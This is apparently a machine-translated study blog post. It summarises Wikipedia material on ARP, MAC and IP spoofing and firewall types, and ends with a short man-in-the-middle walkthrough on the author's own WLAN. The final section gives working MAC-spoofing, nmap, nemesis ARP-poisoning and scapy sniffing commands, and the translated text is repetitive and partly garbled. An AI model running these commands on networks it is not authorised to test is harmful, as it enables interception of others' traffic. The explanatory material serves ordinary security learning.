First of all, let's be popular with Wikipedia. Then try to carry out a man in the middle attack.
theoretical basis
- Understand the hierarchical architecture of computer network.
Understand the hierarchical architecture of computer network.
- Accustomed to actively using search engines to find knowledge
Accustomed to actively using search engines to find knowledge
The following is from Wikipedia
Arp Spoofing
It is a technology that attackers send forged ARP messages on LAN. It is usually to associate the IP address of another host with the MAC address of the attacker. Direct traffic from that host's IP address to the attacker.
ARP Spoofing allows attackers to intercept data frames on a local area network (LAN), change traffic, or block traffic. It is usually used as the beginning of other attacks such as denial of service (DOS), man in the middle (mitm) or session hijacking.
The attack is limited to the LAN using ARP protocol.
LAN communication needs to transform IP address of network layer into MAC address of data link layer to transmit in data link layer. When you know the IP address of a host, you need to obtain its MAC address (arpequest) through a broadcast. This host response (ARP reply) contains the MAC address of this IP.
The ARP protocol has no state, and the host will automatically cache any ARP replies they receive, regardless of whether they have requested them or not. Even if there is no expired ARP cache, it will be overwritten by the new ARP response. The host could not authenticate the source of the package.
Generally, an ARP attack may come from the compromised machine or directly from the attacker's host. Generally, the target of the attack is to associate the MAC address of the attacker with the IP address of the target machine, which means that the traffic sent to the target is sent to the attacker. Attackers can:
- Intercept the data and forward it to the target intact. (eavesdropping)
- Change data content and forward to target (mitm)
- DOS attack on target by discarding all or part of packets
The defensive measures include:
- Static ARP table.
- Some software uses some form of authentication or cross checking of ARP responses. DHCP server, independent host, Ethernet switch or other network equipment can have this function. For example, multiple IPS associated with a MAC address may indicate ARP spoofing.
- Operating systems react differently. Linux ignores any unsolicited responses, but uses visible requests from other machines to update the cache. Solaris updates cache entries only after a timeout. In windows, you can configure it in HKEY? Local? Machine \ system \ currentcontrolset \ services \ TCPIP \ parameters, arpcachelife, arpcacheminreferencelife, arpuseethersnap, arptrsingleroute, arpalwayssourceroute, arpretrycount.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, ArpCacheLife, ArpCacheMinReferenceLife, ArpUseEtherSNAP, ArpTRSingleRoute, ArpAlwaysSourceRoute, ArpRetryCount
- Host defense. It is possible to reject any reply update that is different from the MAC address in the cache. It is possible to accept different MAC addresses but detect whether the previous MAC address is still in use. These are based on the fact that the MAC address in the existing cache is legal.
- Passive detection. Detecting ARP requests and responses on the network to establish an IP-MAC database
- The DHCP server establishes and maintains the corresponding list for the gateway after IP allocation.
Mac Spoofing
It is a technology to change the MAC (media access control) address of an interface on a network device. The MAC address is hard coded into the network interface controller and cannot be changed. However, there is a way to make the operating system believe that the network card uses the MAC address specified by the user. Usually this changes the identity of a computer, but it's quite simple.
Usually in order to bypass the server or router access control list, or hide a computer or pretend to be other network devices. Sometimes it's legal, sometimes it's illegal.
- To use new hardware or multiple hardware on ISPs that use MAC bound. But attackers can also use the technology.
- In order to meet some software requirements of binding MAC address
- Identity is hidden to protect privacy. The Wi Fi connection MAC address is not encrypted. Therefore, in monitor mode, the network card is easy to collect MAC address. In order not to be tracked, Mac can be used to cheat. However, attackers can use this technology to impersonate authenticated users to carry out illegal activities, and it is difficult to detect.
Mac spoofing hosts can usually receive information (some special security switch configurations can prevent the transmission of such packets). However, MAC address forgery is limited to the local broadcast domain.
IP Spoofing
It is a kind of behavior that forges the source address in IP packets. One is to hide the identity of forgers, the other is to pretend to be other machines.
By changing the source address segment of IP packet header, the attacker makes it appear that it comes from other machines. The machine that receives the fake package returns the package to the wrong machine. Usually attackers don't care about the returned packets, or they can reliably detect the response.
Under certain circumstances, an attacker may be able to see or redirect packets to his own machine. This often happens on local area network or local wireless LAN.
IP spoofing is often used for DoS attacks, because packets come from different addresses, which makes filtering difficult. This makes IP based defense no longer effective. Backscatter is a statistical technique based on invalid address packets, but more complex attacks can also avoid invalid addresses.
IP spoofing is also used to bypass IP based authentication. Although this method can change thousands of packets at a time to make it very difficult to implement when attacking remote systems, it is very effective between trusted intranet machines.
IP spoofing is sometimes used as a website performance test.
Services vulnerable to IP spoofing are:
- RPC
- Any IP based authentication
- X Window System
- R (remote) services such as rlogin, RSH
Defense mode
- Packet filtering. The gateway filters the IP address of the exit or entry package, such as URPF (unicast reverse path forwarding).
- The design is not based on IP network protocol and service.
- Some upper level agreements provide some defense. For example, TCP uses serial numbers to communicate with remote machines to ensure that packets arriving are part of an established connection. Because attackers usually don't see any response packets, they have to guess the sequence number to hijack the connection. The TCP sequence number of some older systems or network devices can be predicted.
Email Spoofing
Later, in fact, I thought of this when the GIT server we built on the intranet sent me an email and received it.
URL Spoofing
Let's talk about it later. I think of the dirty flow URL hacking on the dark cloud.
FireWall
From the perspective of development history, firewall development can be divided into three generations:
- Packet filtering. This generation of firewalls only filters individual packets. If a matching rule is found, the packet is discarded (dropped quietly) or rejected (returned error). Usually these rules are packet source address, destination address, protocol, and ports such as for TCP and UDP. It has no information about the connection and is stateless. This generation firewall mainly works in the next three layers and slightly peeks at the source and destination addresses and ports of the transport layer.
Packet filtering. This generation of firewalls only filters individual packets. If a matching rule is found, the packet is discarded (dropped quietly) or rejected (returned error). Usually these rules are packet source address, destination address, protocol, and ports such as for TCP and UDP. It has no information about the connection and is stateless.
This generation firewall mainly works in the next three layers and slightly peeks at the source and destination addresses and ports of the transport layer.
- Stateful filtering. It not only has the function of the first generation firewall, but also works on the OSI layer 4 transport layer. It will take the connection status as an evaluation standard. It remains until it accepts enough packets to determine its connection state. It records all connections that have passed and determines whether a package is the beginning of a new connection or part of an existing connection or not.
Stateful filtering. It not only has the function of the first generation firewall, but also works on the OSI layer 4 transport layer. It will take the connection status as an evaluation standard. It remains until it accepts enough packets to determine its connection state. It records all connections that have passed and determines whether a package is the beginning of a new connection or part of an existing connection or not.
连接状态
- The application level firewall works in the application layer. It can understand the upper layer protocol, so it can detect whether an illegal protocol is trying to cross the firewall through a legal port. The legendary next generation firewall (NGFW) is to extend and deepen the inspection of application layer stack.
The application level firewall works in the application layer. It can understand the upper layer protocol, so it can detect whether an illegal protocol is trying to cross the firewall through a legal port. The legendary next generation firewall (NGFW) is to extend and deepen the inspection of application layer stack.
The firewall can be classified according to the location where the communication is intercepted and the status tracked:
- The network layer or packet filtering mainly works in the TCP / IP layer of the relative bottom layer, relying on rule filtering. There are two types: stateful: store the current connection phase and source destination address port. If a package does not belong to an existing connection, evaluate it by rules of the new connection. If a package belongs to a known connection, the stateless is handled in the same way as the connection. Need less memory, faster. Suitable for handling Connectionless Protocols. However, complex decisions cannot be made based on communication state. An example is iptables
The network layer or packet filtering mainly works in the TCP / IP layer of the relative bottom layer, relying on rule filtering. There are two kinds:
- Stateful: stores the current connection phase, source and destination address port. If a package does not belong to an existing connection, evaluate it by rules of the new connection. If a package belongs to a known connection, it will be processed as the connection
Stateful: stores the current connection phase, source and destination address port. If a package does not belong to an existing connection, evaluate it by rules of the new connection. If a package belongs to a known connection, it will be processed as the connection
- Stateless. Need less memory, faster. Suitable for handling Connectionless Protocols. However, complex decisions cannot be made based on communication state. An example is iptables
Stateless. Need less memory, faster. Suitable for handling Connectionless Protocols. However, complex decisions cannot be made based on communication state. An example is iptables
- Application layer firewall: intercepts interprocess communication through socket, and uses various rules to filter. Unable to resist the underlying vulnerability mining, is being replaced by a mandatory access control (MAC) application firewall, namely sandbox.
Application layer firewall: intercepts interprocess communication through socket, and uses various rules to filter. Unable to resist the underlying vulnerability mining, is being replaced by a mandatory access control (MAC) application firewall, namely sandbox.
- Agent: whether it is dedicated hardware or software, it works by responding to the input package in an application way. A proxy server is a gateway from one network to another specific network application, acting on behalf of users in the network. The proxy server makes the internal network and the external network more completely isolated, but the attacker can also attack the internal network by using a machine as a proxy.
Agent: whether it is dedicated hardware or software, it works by responding to the input package in an application way. A proxy server is a gateway from one network to another specific network application, acting on behalf of users in the network. The proxy server makes the internal network and the external network more completely isolated, but the attacker can also attack the internal network by using a machine as a proxy.
- Nat -- network address translation: firewalls usually have these functions, and the machines behind firewalls usually have private IP addresses. Originally used to alleviate the crisis of insufficient use of IPv4 address, it has unexpectedly become an important defense means of anti network investigation.
Nat -- network address translation: firewalls usually have these functions, and the machines behind firewalls usually have private IP addresses. Originally used to alleviate the crisis of insufficient use of IPv4 address, it has unexpectedly become an important defense means of anti network investigation.
Rogue DHCP
Forged DHCP server, temporarily omitted.
DNS series
Put it in DNS
Next, try a man in the middle attack. I open my mobile phone and notebook in WLAN.
0.0) mac spoofing
sudo ip link set eth0 down
sudo ip link set dev eth0 address 38:AA:3C:E6:FE:69
ip link set eth0 up
0.1) preparation
ifconfig wlan0 promisc
echo 1 > /proc/sys/net/ipv4/ip_forward
1) Search for
sudo nmap -sS 192.168.1.0/24
2) ARP attack
while true
do
sudo nemesis arp -v -r -d wlan0 -S 192.168.1.102 -D 192.168.1.1 -h E8:39:DF:08:F4:FB -m EC:88:8F:B4:D6:68 -H E8:39:DF:08:F4:FB -M EC:88:8F:B4:D6:68
sudo nemesis arp -v -r -d wlan0 -S 192.168.1.1 -D 192.168.1.102 -h E8:39:DF:08:F4:FB -m 68:5D:43:2E:AA:59 -H E8:39:DF:08:F4:FB -M 68:5D:43:2E:AA:59
done
3) monitoring
pkts = sniff(filter=”tcp and host 192.168.1.102”,iface=”wlan0”,
prn=lambda x: sprintf(“{IP:%IP.src% -\>
%IP.dst%\\n}{Raw:%Raw.load%\\n}”))